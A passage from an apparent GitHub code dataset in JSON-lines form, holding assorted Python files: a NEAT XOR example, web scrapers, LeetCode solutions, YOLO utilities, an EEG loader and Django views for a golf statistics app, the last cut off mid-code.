:)\n \"\"\"\n\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n error = 4.0\n for xi, xo in zip(xor_inputs, xor_outputs):\n output = net.activate(xi)\n error -= (output[0] - xo[0]) ** 2\n return error\n\n\ndef run(config_file):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Create the population, which is the top-level object for a NEAT run.\n p = neat.Population(config)\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n\n # Run for up to 300 generations.\n pe = neat.ParallelEvaluator(multiprocessing.cpu_count(), eval_genome)\n winner = p.run(pe.evaluate, 300)\n\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n print('\\nOutput:')\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n for xi, xo in zip(xor_inputs, xor_outputs):\n output = winner_net.activate(xi)\n print(\"input {!r}, expected output {!r}, got {!r}\".format(xi, xo, output))\n\n node_names = {-1: 'A', -2: 'B', 0: 'A XOR B'}\n visualize.draw_net(config, winner, True, node_names=node_names)\n visualize.draw_net(config, winner, True, node_names=node_names, prune_unused=True)\n visualize.plot_stats(stats, ylog=False, view=True)\n visualize.plot_species(stats, view=True)\n\n\nif __name__ == '__main__':\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward')\n run(config_path)\n","repo_name":"CodeReclaimers/neat-python","sub_path":"examples/xor/evolve-feedforward-parallel.py","file_name":"evolve-feedforward-parallel.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":1290,"dataset":"github-code","pt":"3"} +{"seq_id":"25022934784","text":"# -*- coding = utf-8 -*-\n\nimport requests\nimport bs4\n# import openpyxl\n# from bs4 import BeautifulSoup\n\n# 2020中国大学排名\ndef getHTMLText(url):\n try:\n r = requests.get(url,timeout = 10)\n r.encoding = r.apparent_encoding\n r.raise_for_status()\n demo = r.text\n soup = bs4.BeautifulSoup(demo, 'lxml')\n return soup\n except:\n print('获取异常')\n\ndef fillUnivlist(soup):\n ulist = []\n for tr in soup.find('tbody').children:\n if isinstance(tr,bs4.element.Tag):\n tds = tr('td')\n ulist.append([tds[0].string.replace('\\n','').replace(' ',''),tds[1].text.replace('\\n','').replace(' ',''),tds[4].string.replace('\\n','').replace(' ','')])\n return ulist\n\ndef printUnivlist(ulist,num):\n tpl = '{0:^10}\\t{1:{3}^15}\\t{2:^10}'\n print(tpl.format('排名','学校名称','总分',chr(12288)))\n for i in range(num):\n u = ulist[i]\n print(tpl.format(u[0],u[1],u[2],chr(12288)))\n\n# def save_to_excel(ulist):\n# wb = openpyxl.Workbook()\n# ws = wb.active\n# ws['A1'] = '排名'\n# ws['B1'] = '学校名称'\n# ws['C1'] = '总分'\n# for u in ulist:\n# ws.append(u)\n# wb.save('C:\\\\Users\\\\陌离\\\\Desktop\\\\中国大学排名.xlsx')\n\ndef main():\n url = 'http://www.shanghairanking.cn/rankings/bcur/2020'\n soup = getHTMLText(url)\n ulist = fillUnivlist(soup)\n printUnivlist(ulist,567)\n # save_to_excel(ulist)\n\nif __name__ == '__main__':\n main()","repo_name":"1552845373/Python","sub_path":"爬虫/university rank.py","file_name":"university 
rank.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19946057521","text":"from elmo.elmoformanylangs import Embedder\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.decomposition import TruncatedSVD\n\nco = pd.read_pickle('/home/mluser/master8_projects/clustering_vacancies/data/corpus/df_vacancies_full_ru_42K.pkl')\ndocuments = np.array(co.preprocessed_text)\n\nembedder = Embedder('elmo/model/')\n\nvectors = embedder.sents2elmo(documents)\n\nnew_vectors = []\nfor vector in vectors:\n new_vectors.append(vector.mean(0))\n\nvectors = np.array(new_vectors)\n\nsvd = TruncatedSVD(n_components=300).fit(vectors)\nvectors = svd.transform(vectors)\n\nco['elmo_300'] = vectors.tolist()\nco = co[['id', 'is_prog', 'is_test', 'is_train', 'label_true', 'elmo_300']]\n\nco.to_pickle('/home/mluser/master8_projects/clustering_vacancies/data/corpus/df_vacancies_full_ru_42K_elmo.pkl')","repo_name":"omega1996/vacancy_clustering","sub_path":"scripts/vectorizing_elmo.py","file_name":"vectorizing_elmo.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19667010376","text":"# Method 1: Recursion + memoisation\n# Time : O(n^4) = TLE\n\n# Logic: for forming the target[0] (i.e 1st char in remaining target)\n# we can use any of the char from all words from the next possible index(last index we used for target formation)\n\nclass Solution:\n def numWays(self, words: List[str], target: str) -> int:\n n = len(words[0]) # all of same length\n mod = 10**9 + 7\n\n @lru_cache(None)\n def solve(target , ind):\n if not target:\n return 1\n if ind >= n:\n return 0\n ans = 0\n for word in words:\n for k in range(ind, n):\n if target[0] == word[k]:\n ans += solve(target[1: ], k + 1)\n return ans % mod\n\n return solve(target , 0) # [target, possibleIndexToChoose]\n \n\n# How we can optimise this?\n# Observe: \"Once you use the kth character of the jth string of words, \n# you can no longer use the xth character of any string in words where x <= k. 
\n# In other words, all characters to the left of or at index k become unusuable for every string\".\n\n# From since we are not allowed to move backward ,why to move to same index in any of the other word?\n# For each index 'i' in words, we can store the no of possible ways to get target[j].\n\n# Note: length of 'target' can't be greater than len(words[0]).\n\n# See the code for more.\n# Time: O(n^2) , space : O(n^2) + O(m*26), m = len(words[0])\n\nclass Solution:\n def numWays(self, words: List[str], target: str) -> int:\n # storing the count of each char at each index including all words in dictionary.\n # for this we need a dictionary or 2d array for m(len(words[0])).\n m , n = len(words[0]), len(target)\n countCharAtIndex = [Counter() for i in range(m)] # will keep tarck of no of char 'c' at 'i'th index.\n # counter will directly give value = 0 if char is not present at that index considering all words.\n for word in words:\n for i, c in enumerate(word):\n countCharAtIndex[i][c] += 1 # At ith index count of 'c'.\n \n # Now for forming the target\n # we have 2 options:\n # 1) Don't include char of this index from any of the word so simply move to next function call (Not Take)\n # 2) Take the char at this index:\n # in this ans will depend on count of 'target[i]' i.e say 'n' including all words then ans = n * next function call\n # And last return sum of both\n\n mod = 10**9 + 7\n\n @lru_cache(None)\n def solve(i, j):\n if i == n:\n # found one of possible ways\n return 1\n if j == m:\n # Without getting target went out of array i.e no possible way\n return 0\n # choice 1: Not include char of cur index from any of the word\n ans = solve(i, j + 1) # have to search from index 'i' only\n # choice 2: if we consider the char at cur index from any of the word.\n c = target[i] # curChar\n ans += countCharAtIndex[j][c] * solve(i + 1 , j + 1) # have to search from index 'i + 1' only\n return ans % mod\n \n return solve(0 , 0) # [TargetIndex , wordIndex]\n\n\n","repo_name":"Ravi-0412/DSA-Program-And-Notes","sub_path":"Dynamic Programming/0_1_knapsack/1639. Number of Ways to Form a Target String Given a Dictionary.py","file_name":"1639. 
Number of Ways to Form a Target String Given a Dictionary.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"43179237730","text":"import sys\n\ninput = sys.stdin.readline\n\ndef YESorNo():\n n = int(input())\n phone_num = {input().rstrip() for i in range(n)}\n for num in phone_num:\n for j in range(1, len(num)):\n if num[0:j] in phone_num:\n return False\n return True\n\n\nt = int(input())\n\nfor TC in range(1, t+1):\n result = YESorNo()\n if result:\n print('YES')\n else:\n print('NO')","repo_name":"sondongmin0419/study","sub_path":"python/b_5052 전화번호 목록.py","file_name":"b_5052 전화번호 목록.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21314769780","text":"from urllib.request import urlopen\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom requests.exceptions import ChunkedEncodingError\r\n\r\n\r\n# URL 정보\r\ndef get_page(no):\r\n url = f'http://kb.or.kr/p/index.php?j=41&ej_code=notice&st=100&sv=&pno=15&sort=0&page={no}'\r\n return url\r\n\r\n\r\n# URL 정보로 data 가져오기\r\ndef get_data(url):\r\n try:\r\n req = requests.get(url, stream=True)\r\n html = req.content\r\n soup = BeautifulSoup(html, 'html.parser')\r\n table = soup.find(id='ej-tbl')\r\n title = table.find_all('a')\r\n return title\r\n\r\n except ChunkedEncodingError:\r\n print('에러 발생')\r\n\r\n\r\n# def show_title(pdata, page_no):\r\n# BASE_URL = 'http://kb.or.kr/'\r\n# title = []\r\n# hrefs = []\r\n# page_dic = []\r\n# for i in pdata:\r\n\r\n\r\ndef main():\r\n for i in range(1, 24):\r\n page_data = get_data(get_page(i))\r\n for n in page_data:\r\n print(n.get_text())\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"hickee032/python","sub_path":"beautifulsoup(뷰티풀_수프)/BeautifulSoup_04.py","file_name":"BeautifulSoup_04.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22750611089","text":"#MyModule0315.py\n# Author: Yuichiro SUGA\n# Created: 2018-04-24\n# Email: dmq0039@mail4.doshisha.ac.jp\nimport random\n\ndef printEven(a):\n for ax in a:\n if ax % 2 == 0:\n print(ax)\n\n\ndef printNumber(N):\n num = 0\n total = 0\n while total < N:\n num = random.randint(0,10)\n total += num\n print(\"+{:>2d}:\".format(num), total)\n print(\"Total:\", total)\n","repo_name":"baccatore/Advanced-Lectures-in-Medical-Informatics","sub_path":"ch3/MyModule0315.py","file_name":"MyModule0315.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29756503577","text":"import tensorflow as tf\nimport numpy as np\nimport cv2\nfrom nms import *\n\nFLAGS = tf.app.flags.FLAGS\n\ndef draw_boxes(img, bboxes, classes, idx_to_txt):\n h, w, _ = img.shape\n for i, box in enumerate(bboxes):\n scale_img = [h, w, h, w]\n box = [int(a*b) for a,b in zip(box, scale_img)]\n draw_box(img, classes[i], idx_to_txt, box)\n\ndef draw_box(img, cls, idx_to_txt, box):\n hsv = np.array([[[int(cls/float(len(idx_to_txt))*255), 255, 255]]], dtype=np.uint8)\n bgr = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)[0, 0, :]\n bgr = [int(i) for i in bgr]\n text = idx_to_txt[cls]\n cv2.rectangle(img, (box[1], box[0]), (box[3], box[2]), bgr, 2)\n cv2.putText(img, text, (box[1], box[0]), cv2.FONT_HERSHEY_SIMPLEX, 1, bgr)\n\ndef parse_names(filename):\n f = open(filename, 'r')\n 
dic = {}\n for idx, line in enumerate(f):\n dic[idx] = line.strip()\n return dic\n\ndef preprocess_image(img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (416, 416))\n img = np.expand_dims(img, 0)\n img = img / 255.0\n return img\n","repo_name":"jkschin/YOLO","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19680247862","text":"import os\nfrom setuptools import setup,find_packages\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name = \"jenkins-buddy\",\n version = \"0.0.5\",\n author = \"Larry Cai\",\n author_email = \"larry.cai@gmail.com\",\n description = (\"Jenkins buddy to create jenkins easily, require jenkins-job-builder\"),\n license = \"OSI\",\n keywords = \"jenkins, plugin\",\n url = \"http://github.com/larrycai/jenkins-buddy\",\n packages=find_packages(), \n long_description=read('README.md'),\n install_requires=[\"jenkins-job-builder>=0.6.0\"],\n classifiers=[\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python'\n ],\n entry_points={\n 'console_scripts': [\n 'jenkins-buddy=jenkins_buddy.cmd:main', # this will be added for more\n ],\n 'jenkins_jobs.publishers': [\n 'artifactdeployer=jenkins_buddy.modules.publishers:artifactdeployer',\n ],\n }\n)\n","repo_name":"larrycai/jenkins-buddy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"36065546184","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\ndef load_data_files(num_samples: int, name: str, shape: str = \"1d\", num_dipoles: int = 1):\n \"\"\"\n Name is either \"dipole_area\", \"dipoles_w_amplitudes\" or \"simple_dipole\"\n Shape is either \"1d\", \"2d\" or \"interpolated\"\n \"\"\"\n valid_names = ['dipole_area', 'dipoles_w_amplitudes', 'simple_dipole']\n valid_shapes = ['1d', '2d', 'interpolated']\n if not name in valid_names:\n raise ValueError(f'name must be one of {valid_names}, not {name}')\n if not shape in valid_shapes:\n raise ValueError(f'shape must be one of {valid_shapes}, not {shape}')\n\n try:\n eeg = np.load(f'data/train_test_{name}_eeg_70000_{num_dipoles}.npy')\n pos_list = np.load(f'data/train_test_{name}_locations_70000_{num_dipoles}.npy')\n\n # eeg = np.load(f'data/train_test_const_A_{name}_const_A_eeg_70000_{num_dipoles}.npy')\n # pos_list = np.load(f'data/train_test_const_A_{name}_const_A_locations_70000_{num_dipoles}.npy')\n\n except FileNotFoundError as e:\n print(f'The eeg data you seek (num_samples = {num_samples}, name = {name}, shape = {shape}) has not yet been produced.')\n raise e\n\n # Necessary in case of CNN\n if shape == \"interpolated\":\n print(f'You are now interpolating the EEG data with {num_dipoles} dipoles')\n eeg = return_interpolated_eeg_data(eeg, num_samples)\n elif shape == \"2d\":\n eeg = return_2d_eeg_data(eeg, num_samples)\n\n return eeg, 
pos_list\n","repo_name":"kamillasulebakk/DiLoc","sub_path":"Finals/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74823770322","text":"from random import randint\n\nfrom Hunter_Summons_warlock import Warlock\nfrom Rogue_Paladin import Rogue, Paladin\nfrom Shaman_Druid_Priest import Druid, Priest\nfrom Warrior_Mage import Warrior, Mage\n\nfrom Pvp_all import Pvp_all\n\nwords = {\n 1: \"Да будет Бой! Что же у нас по героям?\",\n 2: \"Выбирайте персонажей на величайшую битв��!\",\n 3: 'Ну, да начнется бой!',\n 4: 'Это будет схваткой тысячелетия!'\n}\nunits = {\n 1: Warrior,\n 2: Mage,\n 3: Rogue,\n 4: Paladin,\n # 5: Hunter,\n 6: Warlock,\n # 7: Shaman,\n 8: Druid,\n 9: Priest\n\n}\nchoice_end = True\nwhile choice_end:\n print(\"Приветствую тебя, странник! Если желаешь сыграть в пвп, жми 1, если против мобов - 2.\")\n choice1 = int(input())\n if choice1 == 1:\n print(words[randint(1, 4)])\n Pvp_all(list(map(int, input('Введите количество человек в каждой команде: ').split())))\n elif choice1 == 2:\n pass\n else:\n print('Incorrect choice')\n if int(input('if you want to close\\end press 0: ')) == 0:\n choice_end = False\nprint('Bye!')\n","repo_name":"Tmi-creator/project-oleg2","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25071655989","text":"from django.views import generic\nfrom .models import Person, Stat\nfrom django.db.models import Q\nfrom django.shortcuts import get_object_or_404\nfrom django.urls import reverse_lazy\nfrom .forms import StatCreateForm, PersonCreateForm, CSVUploadForm\nimport pandas as pd\nfrom . 
import plugin_plotly\nfrom django.core.paginator import Paginator\nfrom .forms import PersonCreateForm\nfrom django.db.models import Avg\nfrom django.shortcuts import redirect\nimport csv\nimport io\nfrom django.contrib import messages\nfrom sklearn.linear_model import LinearRegression\nimport numpy as np\nfrom django.http import HttpResponse\nimport csv,urllib\nimport chardet\n\n#プレイヤー一覧ページ\nclass PersonList(generic.ListView):\n model = Person\n template_name = \"score/index.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n #プレイヤー未登録の場合メッセージを表示する\n login_user_id = self.request.user.id\n person_user = Person.objects.values_list('login_user', flat=True).filter(login_user=login_user_id)\n if person_user.exists() == False:\n context[\"player_add\"] = \"プレイヤーを追加してください\" \n\n #ページネーション\n person_list = Person.objects.filter(login_user=login_user_id)\n persons = Paginator(person_list, 10).get_page(self.request.GET.get('p'))\n\n context[\"persons\"] = persons\n\n return context\n\n#プレイヤー登録ページ\nclass PersonCreate(generic.CreateView):\n model = Person\n template_name = 'score/person_create.html'\n form_class = PersonCreateForm\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['breadcrumbs_list'] = [{'name': 'プレイヤー追加',\n 'url': ''}]\n context[\"persons\"] = Person.objects.all()\n #setting.pyで設定したSEXから選択\n context[\"sexs\"] = [ p[0] for p in Person.sex.field.choices ]\n\n return context\n\n def form_valid(self, form):\n post = form.save(commit=False)\n post.login_user = self.request.user.id\n post.save()\n\n return super().form_valid(form)\n \n\n def get_success_url(self):\n pk = self.request.user.id\n\n return reverse_lazy(\"score:person_list\")\n \n#スタッツ一覧とスタット登録ページ\nclass StatCreate(generic.CreateView):\n template_name = \"score/detail.html\"\n ordering = ('date')\n form_class = StatCreateForm\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n pk = self.kwargs.get(\"pk\")\n \n #スコア未登録の場合メッセージを表示\n stats = Stat.objects.filter(player=pk)\n stats_str = f'{stats}'\n context[\"check\"] = any(map(str.isdigit, stats_str))\n\n context[\"person\"] = get_object_or_404(Person, pk=pk)\n context['breadcrumbs_list'] = [{'name': 'Stats',\n 'url': ''}]\n context[\"stat_p\"] = Paginator(stats, 10).get_page(self.request.GET.get('p'))\n\n #Stat平均\n #Statテーブルが空の場合はエラーになるため\n if Stat.objects.filter(player=pk).all().exists() == True:\n\n score_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"total_score\"))\n score_avg = f'{score_avg}'\n context[\"score_avg\"] = round(float(score_avg.replace(\"{'total_score__avg': \", \"\").replace(\"}\", \"\")),1)\n\n putt_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"putt\"))\n putt_avg = f'{putt_avg}'\n context[\"putt_avg\"] = round(float(putt_avg.replace(\"{'putt__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n fw_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"fw\"))\n fw_avg = f'{fw_avg}'\n context[\"fw_avg\"] = round(float(fw_avg.replace(\"{'fw__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n par_on_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"par_on\"))\n par_on_avg = f'{par_on_avg}'\n context[\"par_on_avg\"] = round(float(par_on_avg.replace(\"{'par_on__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n ob_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"ob\"))\n ob_avg = f'{ob_avg}'\n context[\"ob_avg\"] = round(float(ob_avg.replace(\"{'ob__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n bunker_avg = 
Stat.objects.filter(player=pk).aggregate(Avg(\"bunker\"))\n bunker_avg = f'{bunker_avg}'\n context[\"bunker_avg\"] = round(float(bunker_avg.replace(\"{'bunker__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n penalty_avg = Stat.objects.filter(player=pk).aggregate(Avg(\"penalty\"))\n penalty_avg = f'{penalty_avg}'\n context[\"penalty_avg\"] = round(float(penalty_avg.replace(\"{'penalty__avg': \", \"\").replace(\"}\", \"\")), 1)\n\n return context\n\n def form_valid(self, form):\n post = form.save(commit=False)\n post.player_id = self.kwargs.get(\"pk\")\n post.save()\n\n return super().form_valid(form)\n\n def get_success_url(self):\n pk = self.kwargs.get(\"pk\")\n\n return reverse_lazy(\"score:detail\", kwargs={\"pk\": pk})\n\n#スタッツ分析ページ\nclass StatAnalyze(generic.DetailView):\n model = Person\n template_name = \"score/stat_analyze.html\"\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n pk = self.kwargs.get(\"pk\")\n\n context['breadcrumbs_list'] = [\n {'name': 'Stats', 'url': f'/score/detail/{pk}/'},\n {'name': '分析結果','url': ''}\n ]\n\n #Statテーブルをデータフレーム化\n df = pd.DataFrame(Stat.objects.filter(player_id=pk).values())\n df.columns = [\"id\", \"player_id\", \"date\", \"スコア\", \"パット\", \"FWキープ\", \"パーオン\", \"OB\", \"バンカー\", \"ペナルティ\", \"stat_number\"]\n\n #データ数が7以下だとLinearRegressionがエラーになるでの場合分け\n if len(df) > 7:\n #全stat\n z = df.drop(['id','player_id','date','stat_number'], axis=1)\n\n #一項目が全て同じ値だとエラーになるのでその場合値を変える\n score_count = len(z)-1\n putt_true_count = f'{z.duplicated(\"パット\")}'.count(\"True\")\n if putt_true_count == score_count:\n z.iat[1,1] = 101\n\n fw_true_count = f'{z.duplicated(\"FWキープ\")}'.count(\"True\")\n if fw_true_count == score_count:\n z.iat[1,2] = 101\n\n par_true_count = f'{z.duplicated(\"パーオン\")}'.count(\"True\")\n if par_true_count == score_count:\n z.iat[1,3] = 101\n \n ob_true_count = f'{z.duplicated(\"OB\")}'.count(\"True\")\n if ob_true_count == score_count:\n z.iat[1,4] = 101\n\n bunker_true_count = f'{z.duplicated(\"バンカー\")}'.count(\"True\")\n if bunker_true_count == score_count:\n z.iat[1,5] = 101\n\n penalty_true_count = f'{z.duplicated(\"ペナルティ\")}'.count(\"True\")\n if penalty_true_count == score_count:\n z.iat[1,6] = 101 \n\n #statを標準化\n df_std = z.apply(lambda x: (x-x.mean())/x.std(), axis=0)\n x = df_std.drop(['スコア'], axis=1)\n y = df_std['スコア']\n\n reg = LinearRegression()\n results = reg.fit(x,y)\n coef = reg.coef_.round(4)\n n = x.shape[0]\n p = x.shape[1]\n y_hat = reg.predict(x)\n sse = np.sum((y - y_hat) **2, axis=0)\n sse = sse / (n - p - 1)\n s = np.linalg.inv(np.dot(x.T, x))\n std_err = np.sqrt(np.diagonal(sse * s)).round(4)\n\n t_values = (coef / std_err).round(4)\n t_values_abs = np.abs(t_values)\n col = [\"パット\", \"FWキープ\", \"パーオン\", \"OB\", \"バンカー\", \"ペナルティ\"]\n t_col = dict(zip(col, t_values_abs))\n practice = sorted(t_col.items(), key=lambda x:x[1], reverse=True)\n \n #データ数が7以下の場合\n else:\n #スコア数カウント\n df_score = df.sort_values(\"スコア\")\n data_count = df[\"スコア\"].count()\n \n #各ラウンドのパット数が全ラウンド中何位かと、その時のスコアが全ラウンド中何位かを出し、その差を合計。その値が小さければよりパット数がスコアに影響しているということ。\n df_patt = df.sort_values(by=[\"パット\",\"スコア\"])\n patt_count = [abs(df_patt.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n patt_score = sum(patt_count)\n \n df_fk = df.sort_values(by=[\"FWキープ\",\"スコア\"], ascending=[False,True])\n fk_count = [abs(df_fk.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n fk_score = sum(fk_count)\n \n df_po = df.sort_values(by=[\"パーオン\",\"スコア\"], 
ascending=[False,True])\n po_count = [abs(df_po.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n po_score = sum(po_count)\n \n df_OB = df.sort_values(by=[\"OB\",\"スコア\"])\n OB_count = [abs(df_OB.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n OB_score = sum(OB_count)\n\n df_bunker = df.sort_values(by=[\"バンカー\",\"スコア\"])\n bunker_count = [abs(df_bunker.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n bunker_score = sum(bunker_count)\n \n df_pn = df.sort_values(by=[\"ペナルティ\",\"スコア\"])\n pn_count = [abs(df_pn.index.get_loc(i) - df_score.index.get_loc(i)) for i in range(data_count)]\n pn_score = sum(pn_count)\n\n #影響度を%で出したいので、逆数を取り%に直す。\n calc_add = 1/(OB_score+1) + 1/(pn_score+1) + 1/(fk_score+1) + 1/(po_score+1) + 1/(patt_score+1) + 1/(bunker_score+1)\n cf = 100 / calc_add\n\n result = {\"パット\": round(cf / (patt_score+1),1), \n \"FWキープ\": round(cf / (fk_score+1), 1), \n \"パーオン\": round(cf / (po_score+1), 1), \n \"OB\": round(cf / (OB_score+1), 1), \n \"バンカー\": round(cf / (bunker_score+1),1), \n \"ペナルティ\": round(cf / (pn_score+1), 1)}\n\n practice = sorted(result.items(), key=lambda i: i[1], reverse=True)\n \n result = practice[0][0],practice[1][0],practice[2][0],practice[3][0],practice[4][0],practice[5][0]\n result_a = f'{result}'.translate(str.maketrans({\"(\": \"\", \")\": \"\", \"'\": \"\"}))\n context[\"result_a\"] = result_a \n\n #円グラフ用\n number = practice[0][1],practice[1][1],practice[2][1],practice[3][1],practice[4][1],practice[5][1]\n context[\"chart\"] = plugin_plotly.Plot_PieChart([pie for pie in number], [label for label in result])\n\n return context\n\n#スタッツ削除\nclass StatDelete(generic.DeleteView):\n model = Stat\n template_name = 'score/person_create.html'\n def get_success_url(self):\n player_pk = self.object.player.pk\n return reverse_lazy('score:detail', kwargs={'pk': player_pk})\n\n#プレイヤー削除\nclass PersonDelete(generic.DeleteView):\n model = Person\n\n def get_success_url(self):\n return reverse_lazy('score:person_list')\n\n#カテゴリ別平均ページ\nclass Average(generic.ListView):\n model = Stat\n template_name = \"score/average.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n df_male = pd.DataFrame(Stat.objects.filter(player__sex=\"男性\").values())\n df_female = pd.DataFrame(Stat.objects.filter(player__sex=\"女性\").values())\n\n if Stat.objects.filter(player__sex=\"男性\").values().exists() == True:\n\n #男性平均\n male_score_avgs = round(df_male[[\"player_id\",\"total_score\"]].groupby(\"player_id\").mean()[\"total_score\"].mean(), 1)\n male_putt_avgs = round(df_male[[\"player_id\",\"putt\"]].groupby(\"player_id\").mean()[\"putt\"].mean(), 1)\n male_fw_avgs = round(df_male[[\"player_id\",\"fw\"]].groupby(\"player_id\").mean()[\"fw\"].mean(), 1)\n male_par_on_avgs = round(df_male[[\"player_id\",\"par_on\"]].groupby(\"player_id\").mean()[\"par_on\"].mean(), 1)\n male_ob_avgs = round(df_male[[\"player_id\",\"ob\"]].groupby(\"player_id\").mean()[\"ob\"].mean(), 1)\n male_bunker_avgs = round(df_male[[\"player_id\",\"bunker\"]].groupby(\"player_id\").mean()[\"bunker\"].mean(), 1)\n male_penalty_avgs = round(df_male[[\"player_id\",\"penalty\"]].groupby(\"player_id\").mean()[\"penalty\"].mean(), 1)\n\n #男それぞれの平均\n allmale_score_avg = df_male[[\"player_id\",\"total_score\",\"ob\",\"penalty\",\"fw\",\"par_on\",\"putt\", \"bunker\"]].groupby(\"player_id\").mean()\n male_60 = allmale_score_avg[allmale_score_avg[\"total_score\"] < 70]\n male_70 = 
allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 70) & (allmale_score_avg[\"total_score\"] < 80)]\n male_80 = allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 80) & (allmale_score_avg[\"total_score\"] < 90)]\n male_90 = allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 90) & (allmale_score_avg[\"total_score\"] < 100)]\n male_100 = allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 100) & (allmale_score_avg[\"total_score\"] < 110)]\n male_110 = allmale_score_avg[(allmale_score_avg[\"total_score\"] >= 110) & (allmale_score_avg[\"total_score\"] < 120)]\n male_120 = allmale_score_avg[allmale_score_avg[\"total_score\"] >= 120]\n\n #男性60平均\n male_score_60 = round(male_60.mean()[\"total_score\"], 1)\n male_putt_60 = round(male_60.mean()[\"putt\"], 1)\n male_fw_60 = round(male_60.mean()[\"fw\"], 1)\n male_par_on_60 = round(male_60.mean()[\"par_on\"], 1)\n male_ob_60 = round(male_60.mean()[\"ob\"], 1)\n male_bunker_60 = round(male_60.mean()[\"bunker\"], 1)\n male_penalty_60 = round(male_60.mean()[\"penalty\"], 1)\n\n #男性70平均\n male_score_70 = round(male_70.mean()[\"total_score\"], 1)\n male_putt_70 = round(male_70.mean()[\"putt\"], 1)\n male_fw_70 = round(male_70.mean()[\"fw\"], 1)\n male_par_on_70 = round(male_70.mean()[\"par_on\"], 1)\n male_ob_70 = round(male_70.mean()[\"ob\"], 1)\n male_bunker_70 = round(male_70.mean()[\"bunker\"], 1)\n male_penalty_70 = round(male_70.mean()[\"penalty\"], 1)\n\n #男性80平均\n male_score_80 = round(male_80.mean()[\"total_score\"], 1)\n male_putt_80 = round(male_80.mean()[\"putt\"], 1)\n male_fw_80 = round(male_80.mean()[\"fw\"], 1)\n male_par_on_80 = round(male_80.mean()[\"par_on\"], 1)\n male_ob_80 = round(male_80.mean()[\"ob\"], 1)\n male_bunker_80 = round(male_80.mean()[\"bunker\"], 1)\n male_penalty_80 = round(male_80.mean()[\"penalty\"], 1)\n \n #男性90平均\n male_score_90 = round(male_90.mean()[\"total_score\"], 1)\n male_putt_90 = round(male_90.mean()[\"putt\"], 1)\n male_fw_90 = round(male_90.mean()[\"fw\"], 1)\n male_par_on_90 = 